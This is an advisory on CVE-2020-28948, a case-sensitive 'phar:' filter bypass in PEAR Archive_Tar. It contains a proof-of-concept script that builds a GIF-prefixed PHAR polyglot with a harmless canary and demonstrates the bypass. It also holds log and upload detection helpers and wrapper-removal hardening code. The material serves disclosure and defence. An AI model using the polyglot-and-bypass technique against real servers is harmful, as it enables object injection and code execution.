CVE-2020-28948 Overview
CVE-2020-28948 is an insecure deserialization vulnerability in PEAR Archive_Tar through version 1.4.10. The library implements a block list that rejects filenames beginning with the lowercase phar: stream wrapper prefix, but fails to reject the uppercase PHAR: variant (or any other mixed-case spelling). PHP resolves stream wrapper names case-insensitively, so an attacker who controls a filename passed to Archive_Tar can make the library open a crafted PHAR archive, which unserializes attacker-controlled objects from the archive metadata; the magic methods of those objects (the gadgets) then run in the PHP process [CWE-502]. The flaw affects Drupal core and the Debian, Fedora, and Gentoo packages that ship the PEAR Archive_Tar component.
Critical Impact
Successful exploitation leads to arbitrary code execution in the context of the PHP process handling untrusted archive input.
Affected Products
- PEAR Archive_Tar through 1.4.10
- Drupal core (fixed in SA-CORE-2020-013)
- Debian Linux 9 and 10, Fedora 32–35, Gentoo
Discovery Timeline
- 2020-11-19 - CVE-2020-28948 published to NVD
- 2020-11-19 - Debian Security Advisory DSA-4817 released
- 2020-11-25 - Drupal Security Advisory SA-CORE-2020-013 released
- 2024-11-21 - Last updated in NVD database
Technical Details for CVE-2020-28948
Vulnerability Analysis
Archive_Tar is a PEAR library used to read and write tar archives. The library added a check to prevent processing of filenames using the phar:// stream wrapper, because opening a PHAR through that wrapper parses the archive, and on PHP 7.x parsing unserializes the archive's metadata as a side effect of ordinary filesystem calls such as file_exists, fopen, or stat. (The PHP 8.0 UPGRADING notes changed this: phar metadata is no longer unserialized automatically on wrapper access and is only unserialized when Phar::getMetadata() is called, so the implicit trigger described here applies to PHP 7.x deployments.) The check compared the lowercase string phar: against the start of the supplied filename. PHP stream wrapper resolution is case-insensitive, so a filename beginning with PHAR: bypasses the filter while still being routed to the phar wrapper by the engine. An attacker who can influence a path argument passed to Archive_Tar, for example through a file upload or an administrative archive import flow in Drupal, can place a crafted PHAR archive on the server and trigger deserialization of attacker-controlled objects. Combined with a magic-method gadget chain from the surrounding application, this yields arbitrary code execution.
Root Cause
The root cause is incomplete input validation of the protocol prefix: a case-sensitive string comparison that filters only the lowercase form, while PHP itself accepts any case variation of the wrapper name. A check that keys on the scheme separator :// (which contains no letters) or compares case-insensitively does not have this gap. Refer to the PEAR Archive_Tar GitHub issue for upstream discussion.
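The following PHP script is an added example written for this page; it is not Archive_Tar's code, and its two filter functions are illustrative re-implementations of the bug class rather than quotes of the library. It builds a small PHAR whose metadata holds a harmless canary object, then shows that a lowercase-only prefix check passes a PHAR:// path and that PHP's wrapper lookup still opens the archive. The archive path and the Canary class are assumptions of the example. On PHP 7.x the canary's __wakeup fires already at file_exists(); on PHP 8.0 and later it fires only at the explicit getMetadata() call.

```php
<?php
// Added example for CVE-2020-28948 (not Archive_Tar's code). Run as two
// separate processes so the probe really parses the archive from disk:
//   php -d phar.readonly=0 phar_case.php build /tmp/demo.phar
//   php phar_case.php probe /tmp/demo.phar

// Harmless canary: announces itself when the phar's metadata is unserialized.
class Canary
{
    public function __wakeup(): void
    {
        echo "Canary::__wakeup fired: phar metadata was unserialized\n";
    }
}

// Illustrative lowercase-only check of the kind behind the CVE (assumed
// shape, not a quote of Archive_Tar 1.4.10): strpos() compares bytes exactly.
function vulnerable_filter(string $path): bool
{
    return strpos($path, 'phar://') === 0;
}

// Hardened check: match on '://' (no letters, so case cannot matter) to
// reject every stream wrapper, and also refuse traversal. Assumed shape.
function hardened_filter(string $path): bool
{
    return strpos($path, '://') !== false
        || strpos($path, '../') !== false
        || strpos($path, '..\\') !== false;
}

$mode = $argv[1] ?? '';
$file = $argv[2] ?? sys_get_temp_dir() . '/demo.phar';

if ($mode === 'build') {
    // The Phar class needs phar.readonly=0 to write. The stub may start with
    // anything (here a GIF header, as polyglot uploads do); the wrapper only
    // requires the trailing __HALT_COMPILER(); token.
    $phar = new Phar($file);
    $phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");
    $phar->addFromString('x.txt', "x\n");
    $phar->setMetadata(new Canary());
    echo "wrote $file\n";
    exit(0);
}

if ($mode === 'probe') {
    $path = 'PHAR://' . $file . '/x.txt';
    printf("%-18s %s\n", 'vulnerable filter:', vulnerable_filter($path) ? 'blocked' : 'ALLOWED (bypass)');
    printf("%-18s %s\n", 'hardened filter:', hardened_filter($path) ? 'blocked' : 'ALLOWED');
    // The uppercase scheme resolves to the same phar wrapper. On PHP 7.x the
    // canary fires here, because parsing the archive unserializes its metadata.
    var_dump(file_exists($path));
    // On PHP 8.0+ metadata is unserialized only on request; this call fires it.
    (new Phar($file))->getMetadata();
    exit(0);
}

fwrite(STDERR, "usage: php [-d phar.readonly=0] phar_case.php build|probe [file.phar]\n");
exit(1);
```

The two-process split matters: within a single request ext/phar caches a parsed archive, so a probe in the same process as the build would not re-parse the file and the canary would never fire. The probe deliberately stops at a canary; a real gadget chain would come from classes already loaded by the application.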
Attack Vector
Exploitation requires local access or user interaction: attacker-controlled content has to be placed on the server and a path naming it has to reach Archive_Tar, which in practice means a file upload followed by an archive import performed by the attacker or by a tricked administrator. The attacker uploads a crafted PHAR archive under a benign extension such as .jpg; this works because the phar wrapper identifies an archive by its __HALT_COMPILER(); stub, not by its extension, and the stub may be preceded by a genuine image header. The application is then made to pass a filename such as PHAR://uploads/payload.jpg to Archive_Tar. The deserialization occurs implicitly when the library calls filesystem functions such as file_exists() or fopen() on that path. No memory corruption is involved; the vulnerability is a filename-validation logic flaw that opens the door to PHP object injection.
Detection Methods for CVE-2020-28948
Indicators of Compromise
- Uploaded files, whatever their extension, that contain the PHAR stub terminator __HALT_COMPILER(); anywhere in their leading bytes; the token need not be at offset 0, since a polyglot can start with a valid image header
- Web server or application logs containing path arguments beginning with phar://, PHAR://, Phar://, or any other case variant (also URL-encoded, e.g. Phar%3A%2F%2F), matched case-insensitively
- Unexpected child processes spawned by the PHP-FPM or web server worker after archive operations
Detection Strategies
- Inspect application code paths that pass user-influenced filenames to Archive_Tar constructors or to extract() and listContent() methods
- Scan installed PHP dependencies for Archive_Tar versions at or below 1.4.10, including bundled copies inside Drupal core
- Monitor PHP error and access logs for serialization-related warnings such as __wakeup, __destruct, or unserialize() notices originating from web request handlers
Monitoring Recommendations
- Alert on writes to web-accessible directories of files containing PHAR signatures
- Track outbound network connections initiated by PHP worker processes immediately after archive upload endpoints are hit
- Correlate file upload events with subsequent process executions on the host
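The two detection helpers below are an added example for this page, not tooling shipped by Archive_Tar or Drupal. The first reports files that carry the PHAR stub terminator regardless of extension or leading bytes, for scanning an upload directory; the second pulls the request target out of combined-format access log lines and flags any stream-wrapper scheme case-insensitively, so PHAR:// and Phar:// are caught along with the lowercase form. The log lines and file contents are constructed samples, and the one-megabyte scan window is an assumption.

```php
<?php
// Added detection helpers for this advisory; illustrative code, not tooling
// shipped by Archive_Tar or Drupal. Run: php phar_detect.php [upload_dir]

const PHAR_TOKEN = '__HALT_COMPILER();';

// True if the leading bytes contain the PHAR stub terminator. ext/phar finds
// the token by scanning, so a GIF/JPEG/PDF prefix or a .jpg name hides nothing.
function is_phar_candidate(string $bytes, int $window = 1048576): bool
{
    return strpos(substr($bytes, 0, $window), PHAR_TOKEN) !== false;
}

// Walk a directory (e.g. the web-accessible upload root) and report files
// whose first $window bytes carry the token, regardless of extension.
function scan_dir_for_phar(string $dir, int $window = 1048576): array
{
    $found = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $info) {
        $head = @file_get_contents($info->getPathname(), false, null, 0, $window);
        if ($head !== false && is_phar_candidate($head, $window)) {
            $found[] = $info->getPathname();
        }
    }
    return $found;
}

// Extract the request target from combined-format access log lines, decode it
// once, and report any scheme://, matched case-insensitively so PHAR:// and
// Phar:// are caught. Only the request target is inspected, so https://
// referrers do not create noise.
function find_wrapper_paths(array $lines): array
{
    $hits = [];
    foreach ($lines as $n => $line) {
        if (!preg_match('#"[A-Z]+ (\S+) HTTP/#', $line, $req)) {
            continue;
        }
        $target = urldecode($req[1]);   // handles Phar%3A%2F%2F; double-encoding needs a second pass
        if (preg_match_all('#(?<![a-z0-9])([a-z][a-z0-9+.-]*)://#i', $target, $m)) {
            foreach ($m[1] as $scheme) {
                $hits[] = ['line' => $n + 1, 'scheme' => strtolower($scheme), 'target' => $target];
            }
        }
    }
    return $hits;
}

// Constructed samples (not real captures).
$polyglot = "GIF89a\x01\x00<?php __HALT_COMPILER(); ?>\r\n" . str_repeat("\0", 64);
$realJpeg = "\xFF\xD8\xFF\xE0" . str_repeat("\0", 64);
$logs = [
    '10.0.0.5 - - [25/Nov/2020:10:01:02 +0000] "POST /admin/import?archive=PHAR://sites/default/files/avatar.jpg HTTP/1.1" 200 512 "https://intranet.example/" "Mozilla/5.0"',
    '10.0.0.7 - - [25/Nov/2020:10:01:09 +0000] "GET /admin/import?archive=sites/default/files/ok.tar HTTP/1.1" 200 128 "-" "curl/7.64.0"',
    '10.0.0.9 - - [25/Nov/2020:10:02:41 +0000] "POST /admin/import?archive=Phar%3A%2F%2Fsites%2Fdefault%2Ffiles%2Fx.png HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
];

printf("polyglot sample is PHAR candidate: %s\n", is_phar_candidate($polyglot) ? 'yes' : 'no');
printf("plain JPEG sample is PHAR candidate: %s\n", is_phar_candidate($realJpeg) ? 'yes' : 'no');
foreach (find_wrapper_paths($logs) as $h) {
    printf("log line %d: scheme %s:// in %s%s\n", $h['line'], $h['scheme'], $h['target'],
        $h['scheme'] === 'phar' ? '  <-- phar wrapper' : '');
}
if (isset($argv[1])) {
    foreach (scan_dir_for_phar($argv[1]) as $path) {
        echo "PHAR stub found in: $path\n";
    }
}
```

Only the request target is matched because a combined-format line also carries the referrer, and flagging every https:// there would bury the signal. Schemes other than phar are reported too, because a filename check that only knows about phar is exactly the shape of filter this CVE is about.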
How to Mitigate CVE-2020-28948
Immediate Actions Required
- Upgrade PEAR Archive_Tar to 1.4.11 or later, which filters the prefix case-insensitively
- Apply Drupal core updates per Drupal Security Advisory SA-CORE-2020-013
- Apply distribution updates referenced in Debian DSA-4817 and Gentoo GLSA 202101-23
- Audit applications for any remaining bundled copies of Archive_Tar not managed by the system package manager
Patch Information
Upstream fix is tracked in the PEAR Archive_Tar repository. Distribution patches are available through Debian LTS and multiple Fedora package announcements.
Workarounds
- Restrict the file extensions accepted by upload endpoints and reject files whose contents contain the __HALT_COMPILER(); stub token anywhere in their leading bytes, not only at offset 0, since PHAR polyglots typically lead with a genuine image header
- Where phar:// is not needed by the web application, remove the wrapper in the web SAPI with stream_wrapper_unregister('phar') in an auto_prepend_file, or build PHP with --disable-phar. Note that phar.readonly=1 (the default) only prevents writing phar archives; it does not stop the wrapper from reading one and unserializing its metadata, so it is not a mitigation for this CVE
- Process untrusted archives in an isolated, non-privileged container without write access to web roots
# Debian/Ubuntu carry Archive_Tar inside the php-pear package (the one DSA-4817 updates)
dpkg -s php-pear | grep -i '^version'
pear list | grep -i archive_tar
# Composer-managed applications such as Drupal: show the installed version
composer show pear/archive_tar
# Locate bundled copies the package manager does not track
find / -path '*/Archive/Tar.php' -not -path '/proc/*' 2>/dev/null
# Force upgrade via Composer for application-bundled copies
composer require pear/archive_tar:^1.4.14 --update-with-dependencies
# After removing the phar wrapper, confirm it is absent (this reflects the CLI
# configuration; check the FPM pool's php.ini separately). phar.readonly is not
# a mitigation here, it only governs writing phar archives.
php -i | grep -i 'Registered PHP Streams'
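The prepend file below is an added hardening example for this page, not Drupal or Archive_Tar code. It implements the wrapper-removal workaround listed above: it unregisters the phar stream wrapper for non-CLI SAPIs, leaves the CLI alone because Composer and similar tools run as .phar files, and includes a self-test that shows a PHAR:// path no longer reaches ext/phar. The file path, the HARDEN_PHAR_SELFTEST environment variable and the probe path are assumptions of the example.

```php
<?php
// Added hardening example for this advisory (not Drupal or Archive_Tar code).
// Removes the phar stream wrapper from the web SAPI, which is the control that
// actually stops phar:// metadata unserialization; phar.readonly=1 does not.
// Deploy by pointing the FPM pool's php.ini at it:
//   auto_prepend_file = /etc/php/harden_phar.php
// Self-test from the shell:
//   HARDEN_PHAR_SELFTEST=1 php harden_phar.php

function phar_wrapper_enabled(): bool
{
    return in_array('phar', stream_get_wrappers(), true);
}

// Returns true when the wrapper is absent afterwards. Skips the CLI by default
// because Composer, PHPUnit and other tools are themselves .phar files.
function disable_phar_wrapper(): bool
{
    if (PHP_SAPI === 'cli' && getenv('HARDEN_PHAR_SELFTEST') !== '1') {
        return false;
    }
    if (!phar_wrapper_enabled()) {
        return true;   // already gone, e.g. PHP built with --disable-phar
    }
    return stream_wrapper_unregister('phar');
}

disable_phar_wrapper();

if (PHP_SAPI === 'cli' && getenv('HARDEN_PHAR_SELFTEST') === '1') {
    printf("phar wrapper registered after hardening: %s\n", phar_wrapper_enabled() ? 'yes' : 'no');
    // With the wrapper gone, PHP warns "Unable to find the wrapper "phar"" (suppressed
    // here) and falls back to a plain-file lookup of the literal string, so nothing is
    // parsed and no metadata is unserialized, whatever the case of the scheme.
    printf("file_exists on a PHAR:// path: %s\n", @file_exists('PHAR:///tmp/demo.phar/x.txt') ? 'true' : 'false');
    // A trusted code path that genuinely needs phar can restore the built-in wrapper.
    stream_wrapper_restore('phar');
    printf("phar wrapper registered after restore: %s\n", phar_wrapper_enabled() ? 'yes' : 'no');
}
```

Before deploying, grep the application and its vendor tree for phar:// and for .phar files loaded at runtime; anything found there will break once the wrapper is gone and needs either an allow-listed restore around that code path or an alternative packaging.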
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.